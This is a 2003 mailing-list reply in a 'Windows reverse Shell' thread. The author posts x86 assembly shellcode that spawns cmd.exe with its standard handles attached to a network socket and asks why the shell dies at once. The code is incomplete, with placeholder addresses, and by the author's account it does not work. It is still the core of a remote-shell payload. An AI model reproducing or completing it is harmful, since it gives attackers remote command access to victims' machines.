Re: Windows reverse Shell

From: Berend-Jan Wever (skylinedat_private)
Date: Tue Feb 04 2003 - 16:54:44 PST

  • Next message: Ali Saifullah Khan: "Re: Windows reverse Shell"

     ('binary' encoding is not supported, stored as-is)
    In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>
    I wrote a little piece of shellcode that should spawn a shell using a 
    socket in %ebp, which will execute cmd.exe succesfully. The problem is 
    that cmd.exe dies right away. Has anybody got an idear why ? The source 
    (asm for linux) is included.
    Kind regards,
    Berend-Jan Wever
          mov     $',', %al
          xor     %ecx, %ecx
          dec     %ecx
          repne   scasb             # search for ','
          sub     %al, -1(%edi)
          neg     %ebx
        GetLibraryAndProcAddress: # {
          push    %edi              # > libName
          mov     $-0xXXXXXX, %ebx  #
          call    MakeStringAndNegEbx # put 0 after libName
          call    *(%ebx)           # < LoadLibraryA(libName);
          push    %edi              # > procName
          push    %eax              #  > libHandle
          mov     $-0xXXXXXX, %ebx  #
          call    MakeStringAndNegEbx # put 0 after ProcName
          call    *(%ebx)           # << GetProcAddress(libHandle, procName);
        # }
          # %ebp = socket
          pop     %edi              # < %edi = &strings
          # create a struct StartupInfo on the stack.
          xor     %eax, %eax
          push    %ebp              # HANDLE hStdError = socket
          push    %ebp              # HANDLE hStdOutput = socket
          push    %ebp              # HANDLE hStdInPut = socket
          push    %eax              # LPBYTE lpReserved2 = NULL
          inc     %eax              # WORD   cbReserved2 = 0;
          push    %eax              # WORD   wShowWindow = 1;
          mov     %al, %ah          # 0x101
          push    %eax              # DWORD  dwFlags = STARTF_USESHOWWINDOW |
          xor     %eax, %eax        #                  STARTF_USESTDHANDLES
          push    %eax              # DWORD  dwFillAttribute = 0
          push    %eax              # DWORD  dwYCountChars = 0
          push    %eax              # DWORD  dwXCountChars = 0
          push    %eax              # DWORD  dwYSize = 0
          push    %eax              # DWORD  dwXSize = 0
          push    %eax              # DWORD  dwY = 0
          push    %eax              # DWORD  dwX = 0
          push    %eax              # LPTSTR lpTitle = NULL (program name)
          push    %eax              # LPTSTR lpDesktop = NULL (inherit)
          push    %eax              # LPTSTR lpReserved = NULL
          mov     $0x44, %al
          push    %eax              # DWORD  cb = 0x44 (length);
          mov     %esp, %esi
          # create a struct ProcessInformation on the stack.
          xor     %eax, %eax
          push    %eax              # HANDLE hProcess;
          push    %eax              # HANDLE hThread;
          push    %eax              # DWORD dwProcessId;
          push    %eax              # DWORD dwThreadId;
          # create a process with STD I/O handles hooked to socket.
          push    %esp              # > lpProcessInformation -> stack
          push    %esi              #  > lpStartupInfo -> stack
          push    %eax              #   > lpCurrentDirecty: NULL 
          push    %eax              #    > lpEnvironment: NULL
          push    %eax              #     > dwCreationFlags: 0
          inc     %eax
          push    %eax              #      > bInheritHandles: 1 (true)
          dec     %eax
          push    %eax              #       > lpThreadAttributes: NULL
          push    %eax              #        > lpProcessAttributes: NULL
          push    %edi              #         > lpCommandLine: &('cmd.exe')
          push    %eax              #          > lpApplicationName: NULL
          call    MakeStringAndNegEbx # put 0 after commandline
          call    GetLibraryAndProcAddress # LoadLibrary and GetProcAddress
          call    *%eax             # <<<<<<<<<< CreateProcess(...);
          jmp     InfinitLoop       # wait forever.
          lea   0xXX(%esp), %eax    # socket is on the stack at XX
          mov   (%eax), %ebp        # socket
          call  main1
    The code is followed by this string:

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